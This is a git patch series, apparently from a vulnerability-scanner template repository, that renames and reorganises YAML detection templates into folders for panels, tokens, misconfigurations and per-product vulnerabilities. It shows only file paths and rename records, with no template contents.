diff --git a/panels/workspace-one-uem.yaml b/exposed-panels/workspace-one-uem.yaml
similarity index 100%
rename from panels/workspace-one-uem.yaml
rename to exposed-panels/workspace-one-uem.yaml
diff --git a/panels/workspaceone-uem-airwatch-dashboard-detect.yaml b/exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml
similarity index 100%
rename from panels/workspaceone-uem-airwatch-dashboard-detect.yaml
rename to exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml
diff --git a/tokens/amazon-mws-auth-token-value.yaml b/exposed-tokens/tokens/amazon-mws-auth-token-value.yaml
similarity index 100%
rename from tokens/amazon-mws-auth-token-value.yaml
rename to exposed-tokens/tokens/amazon-mws-auth-token-value.yaml
diff --git a/tokens/aws-access-key-value.yaml b/exposed-tokens/tokens/aws-access-key-value.yaml
similarity index 100%
rename from tokens/aws-access-key-value.yaml
rename to exposed-tokens/tokens/aws-access-key-value.yaml
diff --git a/tokens/credentials-disclosure.yaml b/exposed-tokens/tokens/credentials-disclosure.yaml
similarity index 100%
rename from tokens/credentials-disclosure.yaml
rename to exposed-tokens/tokens/credentials-disclosure.yaml
diff --git a/tokens/fcm-server-key.yaml b/exposed-tokens/tokens/fcm-server-key.yaml
similarity index 100%
rename from tokens/fcm-server-key.yaml
rename to exposed-tokens/tokens/fcm-server-key.yaml
diff --git a/tokens/google-api-key.yaml b/exposed-tokens/tokens/google-api-key.yaml
similarity index 100%
rename from tokens/google-api-key.yaml
rename to exposed-tokens/tokens/google-api-key.yaml
diff --git a/tokens/http-username-password.yaml b/exposed-tokens/tokens/http-username-password.yaml
similarity index 100%
rename from tokens/http-username-password.yaml
rename to exposed-tokens/tokens/http-username-password.yaml
diff --git a/tokens/mailchimp-api-key.yaml b/exposed-tokens/tokens/mailchimp-api-key.yaml
similarity index 100%
rename from tokens/mailchimp-api-key.yaml
rename to exposed-tokens/tokens/mailchimp-api-key.yaml
diff --git a/tokens/slack-access-token.yaml b/exposed-tokens/tokens/slack-access-token.yaml
similarity index 100%
rename from tokens/slack-access-token.yaml
rename to exposed-tokens/tokens/slack-access-token.yaml
diff --git a/payloads/CVE-2020-5776.csv b/helpers/payloads/CVE-2020-5776.csv
similarity index 100%
rename from payloads/CVE-2020-5776.csv
rename to helpers/payloads/CVE-2020-5776.csv
diff --git a/payloads/CVE-2020-6287.xml b/helpers/payloads/CVE-2020-6287.xml
similarity index 100%
rename from payloads/CVE-2020-6287.xml
rename to helpers/payloads/CVE-2020-6287.xml
diff --git a/wordlists/wp-plugins.txt b/helpers/wordlists/wp-plugins.txt
similarity index 100%
rename from wordlists/wp-plugins.txt
rename to helpers/wordlists/wp-plugins.txt
diff --git a/misc/basic-cors-flash.yaml b/miscellaneous/basic-cors-flash.yaml
similarity index 100%
rename from misc/basic-cors-flash.yaml
rename to miscellaneous/basic-cors-flash.yaml
diff --git a/misc/dir-listing.yaml b/miscellaneous/dir-listing.yaml
similarity index 100%
rename from misc/dir-listing.yaml
rename to miscellaneous/dir-listing.yaml
diff --git a/misc/htaccess-config.yaml b/miscellaneous/htaccess-config.yaml
similarity index 100%
rename from misc/htaccess-config.yaml
rename to miscellaneous/htaccess-config.yaml
diff --git a/misc/missing-csp.yaml b/miscellaneous/missing-csp.yaml
similarity index 100%
rename from misc/missing-csp.yaml
rename to miscellaneous/missing-csp.yaml
diff --git a/misc/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml
similarity index 100%
rename from misc/missing-hsts.yaml
rename to miscellaneous/missing-hsts.yaml
diff --git a/misc/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml
similarity index 100%
rename from misc/missing-x-frame-options.yaml
rename to miscellaneous/missing-x-frame-options.yaml
diff --git a/misc/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
similarity index 100%
rename from misc/ntlm-directories.yaml
rename to miscellaneous/ntlm-directories.yaml
diff --git a/misc/old-copyright.yaml b/miscellaneous/old-copyright.yaml
similarity index 100%
rename from misc/old-copyright.yaml
rename to miscellaneous/old-copyright.yaml
diff --git a/misc/robots.txt.yaml b/miscellaneous/robots.txt.yaml
similarity index 100%
rename from misc/robots.txt.yaml
rename to miscellaneous/robots.txt.yaml
diff --git a/misc/security.txt.yaml b/miscellaneous/security.txt.yaml
similarity index 100%
rename from misc/security.txt.yaml
rename to miscellaneous/security.txt.yaml
diff --git a/misc/trace-method.yaml b/miscellaneous/trace-method.yaml
similarity index 100%
rename from misc/trace-method.yaml
rename to miscellaneous/trace-method.yaml
diff --git a/misc/unencrypted-bigip-ltm-cookie.yaml b/miscellaneous/unencrypted-bigip-ltm-cookie.yaml
similarity index 100%
rename from misc/unencrypted-bigip-ltm-cookie.yaml
rename to miscellaneous/unencrypted-bigip-ltm-cookie.yaml
diff --git a/misc/wp-xmlrpc.yaml b/miscellaneous/wp-xmlrpc.yaml
similarity index 100%
rename from misc/wp-xmlrpc.yaml
rename to miscellaneous/wp-xmlrpc.yaml
diff --git a/misc/xml-schema-detect.yaml b/miscellaneous/xml-schema-detect.yaml
similarity index 100%
rename from misc/xml-schema-detect.yaml
rename to miscellaneous/xml-schema-detect.yaml
diff --git a/security-misconfiguration/aem-groovyconsole.yaml b/misconfiguration/aem-groovyconsole.yaml
similarity index 100%
rename from security-misconfiguration/aem-groovyconsole.yaml
rename to misconfiguration/aem-groovyconsole.yaml
diff --git a/security-misconfiguration/apache-tomcat-snoop.yaml b/misconfiguration/apache-tomcat-snoop.yaml
similarity index 100%
rename from security-misconfiguration/apache-tomcat-snoop.yaml
rename to misconfiguration/apache-tomcat-snoop.yaml
diff --git a/security-misconfiguration/aspx-debug-mode.yaml b/misconfiguration/aspx-debug-mode.yaml
similarity index 100%
rename from security-misconfiguration/aspx-debug-mode.yaml
rename to misconfiguration/aspx-debug-mode.yaml
diff --git a/security-misconfiguration/basic-cors.yaml b/misconfiguration/basic-cors.yaml
similarity index 100%
rename from security-misconfiguration/basic-cors.yaml
rename to misconfiguration/basic-cors.yaml
diff --git a/security-misconfiguration/django-debug-detect.yaml b/misconfiguration/django-debug-detect.yaml
similarity index 100%
rename from security-misconfiguration/django-debug-detect.yaml
rename to misconfiguration/django-debug-detect.yaml
diff --git a/security-misconfiguration/drupal-user-enum-ajax.yaml b/misconfiguration/drupal-user-enum-ajax.yaml
similarity index 100%
rename from security-misconfiguration/drupal-user-enum-ajax.yaml
rename to misconfiguration/drupal-user-enum-ajax.yaml
diff --git a/security-misconfiguration/drupal-user-enum-redirect.yaml b/misconfiguration/drupal-user-enum-redirect.yaml
similarity index 100%
rename from security-misconfiguration/drupal-user-enum-redirect.yaml
rename to misconfiguration/drupal-user-enum-redirect.yaml
diff --git a/security-misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml
similarity index 100%
rename from security-misconfiguration/exposed-service-now.yaml
rename to misconfiguration/exposed-service-now.yaml
diff --git a/security-misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml similarity index 100% rename from security-misconfiguration/front-page-misconfig.yaml rename to misconfiguration/front-page-misconfig.yaml diff --git a/generic-detections/basic-xss-prober.yaml b/misconfiguration/generic-detections/basic-xss-prober.yaml similarity index 100% rename from generic-detections/basic-xss-prober.yaml rename to misconfiguration/generic-detections/basic-xss-prober.yaml diff --git a/generic-detections/general-tokens.yaml b/misconfiguration/generic-detections/general-tokens.yaml similarity index 100% rename from generic-detections/general-tokens.yaml rename to misconfiguration/generic-detections/general-tokens.yaml diff --git a/generic-detections/top-15-xss.yaml b/misconfiguration/generic-detections/top-15-xss.yaml similarity index 100% rename from generic-detections/top-15-xss.yaml rename to misconfiguration/generic-detections/top-15-xss.yaml diff --git a/security-misconfiguration/jenkins-stack-trace.yaml b/misconfiguration/jenkins-stack-trace.yaml similarity index 100% rename from security-misconfiguration/jenkins-stack-trace.yaml rename to misconfiguration/jenkins-stack-trace.yaml diff --git a/security-misconfiguration/jira-service-desk-signup.yaml b/misconfiguration/jira-service-desk-signup.yaml similarity index 100% rename from security-misconfiguration/jira-service-desk-signup.yaml rename to misconfiguration/jira-service-desk-signup.yaml diff --git a/security-misconfiguration/jira-unauthenticated-dashboards.yaml b/misconfiguration/jira-unauthenticated-dashboards.yaml similarity index 100% rename from security-misconfiguration/jira-unauthenticated-dashboards.yaml rename to misconfiguration/jira-unauthenticated-dashboards.yaml 
diff --git a/security-misconfiguration/jira-unauthenticated-popular-filters.yaml b/misconfiguration/jira-unauthenticated-popular-filters.yaml similarity index 100% rename from security-misconfiguration/jira-unauthenticated-popular-filters.yaml rename to misconfiguration/jira-unauthenticated-popular-filters.yaml diff --git a/security-misconfiguration/jira-unauthenticated-projects.yaml b/misconfiguration/jira-unauthenticated-projects.yaml similarity index 100% rename from security-misconfiguration/jira-unauthenticated-projects.yaml rename to misconfiguration/jira-unauthenticated-projects.yaml diff --git a/security-misconfiguration/jira-unauthenticated-user-picker.yaml b/misconfiguration/jira-unauthenticated-user-picker.yaml similarity index 100% rename from security-misconfiguration/jira-unauthenticated-user-picker.yaml rename to misconfiguration/jira-unauthenticated-user-picker.yaml diff --git a/security-misconfiguration/jupyter-ipython-unauth.yaml b/misconfiguration/jupyter-ipython-unauth.yaml similarity index 100% rename from security-misconfiguration/jupyter-ipython-unauth.yaml rename to misconfiguration/jupyter-ipython-unauth.yaml diff --git a/security-misconfiguration/larvel-debug.yaml b/misconfiguration/larvel-debug.yaml similarity index 100% rename from security-misconfiguration/larvel-debug.yaml rename to misconfiguration/larvel-debug.yaml diff --git a/security-misconfiguration/manage-engine-ad-search.yaml b/misconfiguration/manage-engine-ad-search.yaml similarity index 100% rename from security-misconfiguration/manage-engine-ad-search.yaml rename to misconfiguration/manage-engine-ad-search.yaml diff --git a/security-misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml similarity index 100% rename from security-misconfiguration/put-method-enabled.yaml rename to misconfiguration/put-method-enabled.yaml 
diff --git a/security-misconfiguration/rack-mini-profiler.yaml b/misconfiguration/rack-mini-profiler.yaml similarity index 100% rename from security-misconfiguration/rack-mini-profiler.yaml rename to misconfiguration/rack-mini-profiler.yaml diff --git a/security-misconfiguration/salesforce-aura-misconfig.yaml b/misconfiguration/salesforce-aura-misconfig.yaml similarity index 100% rename from security-misconfiguration/salesforce-aura-misconfig.yaml rename to misconfiguration/salesforce-aura-misconfig.yaml diff --git a/security-misconfiguration/sidekiq-dashboard.yaml b/misconfiguration/sidekiq-dashboard.yaml similarity index 100% rename from security-misconfiguration/sidekiq-dashboard.yaml rename to misconfiguration/sidekiq-dashboard.yaml diff --git a/security-misconfiguration/springboot-detect.yaml b/misconfiguration/springboot-detect.yaml similarity index 100% rename from security-misconfiguration/springboot-detect.yaml rename to misconfiguration/springboot-detect.yaml diff --git a/security-misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml similarity index 100% rename from security-misconfiguration/unauthenticated-airflow.yaml rename to misconfiguration/unauthenticated-airflow.yaml diff --git a/security-misconfiguration/unauthenticated-jenkin-dashboard.yaml b/misconfiguration/unauthenticated-jenkin-dashboard.yaml similarity index 100% rename from security-misconfiguration/unauthenticated-jenkin-dashboard.yaml rename to misconfiguration/unauthenticated-jenkin-dashboard.yaml diff --git a/security-misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml similarity index 100% rename from security-misconfiguration/unauthenticated-nacos-access.yaml rename to misconfiguration/unauthenticated-nacos-access.yaml 
diff --git a/security-misconfiguration/wamp-xdebug-detect.yaml b/misconfiguration/wamp-xdebug-detect.yaml similarity index 100% rename from security-misconfiguration/wamp-xdebug-detect.yaml rename to misconfiguration/wamp-xdebug-detect.yaml diff --git a/security-misconfiguration/wordpress-accessible-wpconfig.yaml b/misconfiguration/wordpress-accessible-wpconfig.yaml similarity index 100% rename from security-misconfiguration/wordpress-accessible-wpconfig.yaml rename to misconfiguration/wordpress-accessible-wpconfig.yaml diff --git a/security-misconfiguration/zenphoto-installation-sensitive-info.yaml b/misconfiguration/zenphoto-installation-sensitive-info.yaml similarity index 100% rename from security-misconfiguration/zenphoto-installation-sensitive-info.yaml rename to misconfiguration/zenphoto-installation-sensitive-info.yaml diff --git a/subdomain-takeover/detect-all-takeovers.yaml b/takeovers/detect-all-takeovers.yaml similarity index 100% rename from subdomain-takeover/detect-all-takeovers.yaml rename to takeovers/detect-all-takeovers.yaml diff --git a/subdomain-takeover/s3-subtakeover.yaml b/takeovers/s3-subtakeover.yaml similarity index 100% rename from subdomain-takeover/s3-subtakeover.yaml rename to takeovers/s3-subtakeover.yaml From 95d784d9b756f7fc75f560c32a592115d764d1f8 Mon Sep 17 00:00:00 2001 
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 22:25:54 +0530 Subject: [PATCH 20/85] moving folder/files around --- .../{ => apache}/tomcat-manager-default.yaml | 0 .../grafana-default-credential.yaml | 0 .../rabbitmq-default-admin.yaml | 0 .../solarwinds-default-admin.yaml | 0 .../apis}/swagger-panel.yaml | 0 exposed-files/{ => apis}/wadl-files.yaml | 0 exposed-files/{ => apis}/wsdl-detect.yaml | 0 exposed-files/{ => backups}/sql-dump.yaml | 0 .../{ => backups}/zip-backup-files.yaml | 0 .../{ => configs}/composer-config.yaml | 0 exposed-files/{ => configs}/exposed-svn.yaml | 0 .../configs}/git-config-nginxoffbyslash.yaml | 0 exposed-files/{ => configs}/git-config.yaml | 0 exposed-files/{ => configs}/laravel-env.yaml | 0 .../{ => configs}/magento-config.yaml | 0 .../{ => configs}/owncloud-config.yaml | 0 exposed-files/{ => configs}/package-json.yaml | 0 exposed-files/{ => configs}/phpinfo.yaml | 0 .../{ => configs}/redmine-db-config.yaml | 0 exposed-files/{ => configs}/web-config.yaml | 0 exposed-files/{ => logs}/elmah-log-file.yaml | 0 exposed-files/{ => logs}/error-logs.yaml | 0 .../{compal.yaml => compal-panel.yaml} | 0 .../public-tomcat-instance.yaml | 0 .../amazon-mws-auth-token-value.yaml | 0 .../{tokens => aws}/aws-access-key-value.yaml | 0 .../credentials-disclosure.yaml | 0 .../generic}/general-tokens.yaml | 0 .../http-username-password.yaml | 0 .../{tokens => google}/fcm-server-key.yaml | 0 .../{tokens => google}/google-api-key.yaml | 0 .../mailchimp-api-key.yaml | 0 .../{tokens => slack}/slack-access-token.yaml | 0 .../apc-info.yaml | 0 .../basic-xss-prober.yaml | 0 .../cgi-test-page.yaml | 0 .../docker-api.yaml | 0 .../druid-monitor.yaml | 0 .../elasticsearch.yaml | 0 .../exposed-kibana.yaml | 0 .../jkstatus-manager.yaml | 0 .../kubernetes-pods.yaml | 0 .../linkerd-ssrf-detect.yaml | 0 .../php-errors.yaml | 0 .../shell-history.yaml | 0 .../tomcat-scripts.yaml | 0 .../firebase-detect.yaml | 0 {exposed-files 
=> technologies}/jolokia.yaml | 0 vulnerabilities/crlf-injection.yaml | 52 ++++++++++--------- .../generic}/top-15-xss.yaml | 0 .../jenkins}/jenkins-asyncpeople.yaml | 0 .../jenkins}/jenkins-stack-trace.yaml | 0 .../unauthenticated-jenkin-dashboard.yaml | 0 .../jira}/jira-service-desk-signup.yaml | 0 .../jira-unauthenticated-dashboards.yaml | 0 .../jira-unauthenticated-popular-filters.yaml | 0 .../jira}/jira-unauthenticated-projects.yaml | 0 .../jira-unauthenticated-user-picker.yaml | 0 .../{ => moodle}/moodle-filter-jmol-lfi.yaml | 0 .../{ => moodle}/moodle-filter-jmol-xss.yaml | 0 vulnerabilities/open-redirect.yaml | 27 ---------- .../oracle-ebs-bispgraph-file-access.yaml | 0 vulnerabilities/{ => rails}/rails6-xss.yaml | 0 .../springboot-actuators-jolokia-xxe.yaml | 0 .../springboot-h2-db-rce.yaml | 0 .../vmware-vcenter-lfi-linux.yaml | 0 .../{ => vmware}/vmware-vcenter-lfi.yaml | 0 .../{ => wordpress}/easy-wp-smtp-listing.yaml | 0 .../{ => wordpress}/w3c-total-cache-ssrf.yaml | 0 .../wordpress-accessible-wpconfig.yaml | 0 .../wordpress}/wordpress-db-backup.yaml | 0 .../wordpress}/wordpress-debug-log.yaml | 0 .../wordpress-directory-listing.yaml | 0 ...s-emails-verification-for-woocommerce.yaml | 0 .../wordpress-emergency-script.yaml | 0 .../wordpress}/wordpress-installer-log.yaml | 0 .../wordpress-social-metrics-tracker.yaml | 0 .../wordpress}/wordpress-tmm-db-migrate.yaml | 0 .../wordpress-user-enumeration.yaml | 0 .../wordpress-wordfence-xss.yaml | 0 .../wordpress-wpcourses-info-disclosure.yaml | 0 81 files changed, 27 insertions(+), 52 deletions(-) rename default-logins/{ => apache}/tomcat-manager-default.yaml (100%) rename default-logins/{ => grafana}/grafana-default-credential.yaml (100%) rename default-logins/{ => rabbitmq}/rabbitmq-default-admin.yaml (100%) rename default-logins/{ => solarwinds}/solarwinds-default-admin.yaml (100%) rename {exposed-panels => exposed-files/apis}/swagger-panel.yaml (100%) rename exposed-files/{ => apis}/wadl-files.yaml 
(100%) rename exposed-files/{ => apis}/wsdl-detect.yaml (100%) rename exposed-files/{ => backups}/sql-dump.yaml (100%) rename exposed-files/{ => backups}/zip-backup-files.yaml (100%) rename exposed-files/{ => configs}/composer-config.yaml (100%) rename exposed-files/{ => configs}/exposed-svn.yaml (100%) rename {vulnerabilities => exposed-files/configs}/git-config-nginxoffbyslash.yaml (100%) rename exposed-files/{ => configs}/git-config.yaml (100%) rename exposed-files/{ => configs}/laravel-env.yaml (100%) rename exposed-files/{ => configs}/magento-config.yaml (100%) rename exposed-files/{ => configs}/owncloud-config.yaml (100%) rename exposed-files/{ => configs}/package-json.yaml (100%) rename exposed-files/{ => configs}/phpinfo.yaml (100%) rename exposed-files/{ => configs}/redmine-db-config.yaml (100%) rename exposed-files/{ => configs}/web-config.yaml (100%) rename exposed-files/{ => logs}/elmah-log-file.yaml (100%) rename exposed-files/{ => logs}/error-logs.yaml (100%) rename exposed-panels/{compal.yaml => compal-panel.yaml} (100%) rename {exposed-files => exposed-panels}/public-tomcat-instance.yaml (100%) rename exposed-tokens/{tokens => aws}/amazon-mws-auth-token-value.yaml (100%) rename exposed-tokens/{tokens => aws}/aws-access-key-value.yaml (100%) rename exposed-tokens/{tokens => generic}/credentials-disclosure.yaml (100%) rename {misconfiguration/generic-detections => exposed-tokens/generic}/general-tokens.yaml (100%) rename exposed-tokens/{tokens => generic}/http-username-password.yaml (100%) rename exposed-tokens/{tokens => google}/fcm-server-key.yaml (100%) rename exposed-tokens/{tokens => google}/google-api-key.yaml (100%) rename exposed-tokens/{tokens => mailchimp}/mailchimp-api-key.yaml (100%) rename exposed-tokens/{tokens => slack}/slack-access-token.yaml (100%) rename {exposed-files => misconfiguration}/apc-info.yaml (100%) rename misconfiguration/{generic-detections => }/basic-xss-prober.yaml (100%) rename {exposed-files => 
misconfiguration}/cgi-test-page.yaml (100%) rename {exposed-panels => misconfiguration}/docker-api.yaml (100%) rename {exposed-files => misconfiguration}/druid-monitor.yaml (100%) rename {exposed-files => misconfiguration}/elasticsearch.yaml (100%) rename {exposed-files => misconfiguration}/exposed-kibana.yaml (100%) rename {exposed-files => misconfiguration}/jkstatus-manager.yaml (100%) rename {exposed-panels => misconfiguration}/kubernetes-pods.yaml (100%) rename {technologies => misconfiguration}/linkerd-ssrf-detect.yaml (100%) rename {exposed-files => misconfiguration}/php-errors.yaml (100%) rename {exposed-files => misconfiguration}/shell-history.yaml (100%) rename {exposed-files => misconfiguration}/tomcat-scripts.yaml (100%) rename {exposed-files => technologies}/firebase-detect.yaml (100%) rename {exposed-files => technologies}/jolokia.yaml (100%) rename {misconfiguration/generic-detections => vulnerabilities/generic}/top-15-xss.yaml (100%) rename {exposed-panels => vulnerabilities/jenkins}/jenkins-asyncpeople.yaml (100%) rename {misconfiguration => vulnerabilities/jenkins}/jenkins-stack-trace.yaml (100%) rename {misconfiguration => vulnerabilities/jenkins}/unauthenticated-jenkin-dashboard.yaml (100%) rename {misconfiguration => vulnerabilities/jira}/jira-service-desk-signup.yaml (100%) rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-dashboards.yaml (100%) rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-popular-filters.yaml (100%) rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-projects.yaml (100%) rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-user-picker.yaml (100%) rename vulnerabilities/{ => moodle}/moodle-filter-jmol-lfi.yaml (100%) rename vulnerabilities/{ => moodle}/moodle-filter-jmol-xss.yaml (100%) delete mode 100644 vulnerabilities/open-redirect.yaml rename vulnerabilities/{ => oracle}/oracle-ebs-bispgraph-file-access.yaml (100%) rename vulnerabilities/{ 
=> rails}/rails6-xss.yaml (100%) rename vulnerabilities/{ => springboot}/springboot-actuators-jolokia-xxe.yaml (100%) rename vulnerabilities/{ => springboot}/springboot-h2-db-rce.yaml (100%) rename vulnerabilities/{ => vmware}/vmware-vcenter-lfi-linux.yaml (100%) rename vulnerabilities/{ => vmware}/vmware-vcenter-lfi.yaml (100%) rename vulnerabilities/{ => wordpress}/easy-wp-smtp-listing.yaml (100%) rename vulnerabilities/{ => wordpress}/w3c-total-cache-ssrf.yaml (100%) rename {misconfiguration => vulnerabilities/wordpress}/wordpress-accessible-wpconfig.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-db-backup.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-debug-log.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-directory-listing.yaml (100%) rename vulnerabilities/{ => wordpress}/wordpress-emails-verification-for-woocommerce.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-emergency-script.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-installer-log.yaml (100%) rename vulnerabilities/{ => wordpress}/wordpress-social-metrics-tracker.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-tmm-db-migrate.yaml (100%) rename {exposed-files => vulnerabilities/wordpress}/wordpress-user-enumeration.yaml (100%) rename vulnerabilities/{ => wordpress}/wordpress-wordfence-xss.yaml (100%) rename vulnerabilities/{ => wordpress}/wordpress-wpcourses-info-disclosure.yaml (100%) diff --git a/default-logins/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml similarity index 100% rename from default-logins/tomcat-manager-default.yaml rename to default-logins/apache/tomcat-manager-default.yaml 
diff --git a/default-logins/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml similarity index 100% rename from default-logins/grafana-default-credential.yaml rename to default-logins/grafana/grafana-default-credential.yaml diff --git a/default-logins/rabbitmq-default-admin.yaml b/default-logins/rabbitmq/rabbitmq-default-admin.yaml similarity index 100% rename from default-logins/rabbitmq-default-admin.yaml rename to default-logins/rabbitmq/rabbitmq-default-admin.yaml diff --git a/default-logins/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml similarity index 100% rename from default-logins/solarwinds-default-admin.yaml rename to default-logins/solarwinds/solarwinds-default-admin.yaml diff --git a/exposed-panels/swagger-panel.yaml b/exposed-files/apis/swagger-panel.yaml similarity index 100% rename from exposed-panels/swagger-panel.yaml rename to exposed-files/apis/swagger-panel.yaml diff --git a/exposed-files/wadl-files.yaml b/exposed-files/apis/wadl-files.yaml similarity index 100% rename from exposed-files/wadl-files.yaml rename to exposed-files/apis/wadl-files.yaml diff --git a/exposed-files/wsdl-detect.yaml b/exposed-files/apis/wsdl-detect.yaml similarity index 100% rename from exposed-files/wsdl-detect.yaml rename to exposed-files/apis/wsdl-detect.yaml diff --git a/exposed-files/sql-dump.yaml b/exposed-files/backups/sql-dump.yaml similarity index 100% rename from exposed-files/sql-dump.yaml rename to exposed-files/backups/sql-dump.yaml diff --git a/exposed-files/zip-backup-files.yaml b/exposed-files/backups/zip-backup-files.yaml similarity index 100% rename from exposed-files/zip-backup-files.yaml rename to exposed-files/backups/zip-backup-files.yaml diff --git a/exposed-files/composer-config.yaml b/exposed-files/configs/composer-config.yaml similarity index 100% rename from exposed-files/composer-config.yaml rename to exposed-files/configs/composer-config.yaml 
diff --git a/exposed-files/exposed-svn.yaml b/exposed-files/configs/exposed-svn.yaml similarity index 100% rename from exposed-files/exposed-svn.yaml rename to exposed-files/configs/exposed-svn.yaml diff --git a/vulnerabilities/git-config-nginxoffbyslash.yaml b/exposed-files/configs/git-config-nginxoffbyslash.yaml similarity index 100% rename from vulnerabilities/git-config-nginxoffbyslash.yaml rename to exposed-files/configs/git-config-nginxoffbyslash.yaml diff --git a/exposed-files/git-config.yaml b/exposed-files/configs/git-config.yaml similarity index 100% rename from exposed-files/git-config.yaml rename to exposed-files/configs/git-config.yaml diff --git a/exposed-files/laravel-env.yaml b/exposed-files/configs/laravel-env.yaml similarity index 100% rename from exposed-files/laravel-env.yaml rename to exposed-files/configs/laravel-env.yaml diff --git a/exposed-files/magento-config.yaml b/exposed-files/configs/magento-config.yaml similarity index 100% rename from exposed-files/magento-config.yaml rename to exposed-files/configs/magento-config.yaml diff --git a/exposed-files/owncloud-config.yaml b/exposed-files/configs/owncloud-config.yaml similarity index 100% rename from exposed-files/owncloud-config.yaml rename to exposed-files/configs/owncloud-config.yaml diff --git a/exposed-files/package-json.yaml b/exposed-files/configs/package-json.yaml similarity index 100% rename from exposed-files/package-json.yaml rename to exposed-files/configs/package-json.yaml diff --git a/exposed-files/phpinfo.yaml b/exposed-files/configs/phpinfo.yaml similarity index 100% rename from exposed-files/phpinfo.yaml rename to exposed-files/configs/phpinfo.yaml diff --git a/exposed-files/redmine-db-config.yaml b/exposed-files/configs/redmine-db-config.yaml similarity index 100% rename from exposed-files/redmine-db-config.yaml rename to exposed-files/configs/redmine-db-config.yaml 
diff --git a/exposed-files/web-config.yaml b/exposed-files/configs/web-config.yaml similarity index 100% rename from exposed-files/web-config.yaml rename to exposed-files/configs/web-config.yaml diff --git a/exposed-files/elmah-log-file.yaml b/exposed-files/logs/elmah-log-file.yaml similarity index 100% rename from exposed-files/elmah-log-file.yaml rename to exposed-files/logs/elmah-log-file.yaml diff --git a/exposed-files/error-logs.yaml b/exposed-files/logs/error-logs.yaml similarity index 100% rename from exposed-files/error-logs.yaml rename to exposed-files/logs/error-logs.yaml diff --git a/exposed-panels/compal.yaml b/exposed-panels/compal-panel.yaml similarity index 100% rename from exposed-panels/compal.yaml rename to exposed-panels/compal-panel.yaml diff --git a/exposed-files/public-tomcat-instance.yaml b/exposed-panels/public-tomcat-instance.yaml similarity index 100% rename from exposed-files/public-tomcat-instance.yaml rename to exposed-panels/public-tomcat-instance.yaml diff --git a/exposed-tokens/tokens/amazon-mws-auth-token-value.yaml b/exposed-tokens/aws/amazon-mws-auth-token-value.yaml similarity index 100% rename from exposed-tokens/tokens/amazon-mws-auth-token-value.yaml rename to exposed-tokens/aws/amazon-mws-auth-token-value.yaml diff --git a/exposed-tokens/tokens/aws-access-key-value.yaml b/exposed-tokens/aws/aws-access-key-value.yaml similarity index 100% rename from exposed-tokens/tokens/aws-access-key-value.yaml rename to exposed-tokens/aws/aws-access-key-value.yaml diff --git a/exposed-tokens/tokens/credentials-disclosure.yaml b/exposed-tokens/generic/credentials-disclosure.yaml similarity index 100% rename from exposed-tokens/tokens/credentials-disclosure.yaml rename to exposed-tokens/generic/credentials-disclosure.yaml 
diff --git a/misconfiguration/generic-detections/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml similarity index 100% rename from misconfiguration/generic-detections/general-tokens.yaml rename to exposed-tokens/generic/general-tokens.yaml diff --git a/exposed-tokens/tokens/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml similarity index 100% rename from exposed-tokens/tokens/http-username-password.yaml rename to exposed-tokens/generic/http-username-password.yaml diff --git a/exposed-tokens/tokens/fcm-server-key.yaml b/exposed-tokens/google/fcm-server-key.yaml similarity index 100% rename from exposed-tokens/tokens/fcm-server-key.yaml rename to exposed-tokens/google/fcm-server-key.yaml diff --git a/exposed-tokens/tokens/google-api-key.yaml b/exposed-tokens/google/google-api-key.yaml similarity index 100% rename from exposed-tokens/tokens/google-api-key.yaml rename to exposed-tokens/google/google-api-key.yaml diff --git a/exposed-tokens/tokens/mailchimp-api-key.yaml b/exposed-tokens/mailchimp/mailchimp-api-key.yaml similarity index 100% rename from exposed-tokens/tokens/mailchimp-api-key.yaml rename to exposed-tokens/mailchimp/mailchimp-api-key.yaml diff --git a/exposed-tokens/tokens/slack-access-token.yaml b/exposed-tokens/slack/slack-access-token.yaml similarity index 100% rename from exposed-tokens/tokens/slack-access-token.yaml rename to exposed-tokens/slack/slack-access-token.yaml diff --git a/exposed-files/apc-info.yaml b/misconfiguration/apc-info.yaml similarity index 100% rename from exposed-files/apc-info.yaml rename to misconfiguration/apc-info.yaml diff --git a/misconfiguration/generic-detections/basic-xss-prober.yaml b/misconfiguration/basic-xss-prober.yaml similarity index 100% rename from misconfiguration/generic-detections/basic-xss-prober.yaml rename to misconfiguration/basic-xss-prober.yaml 
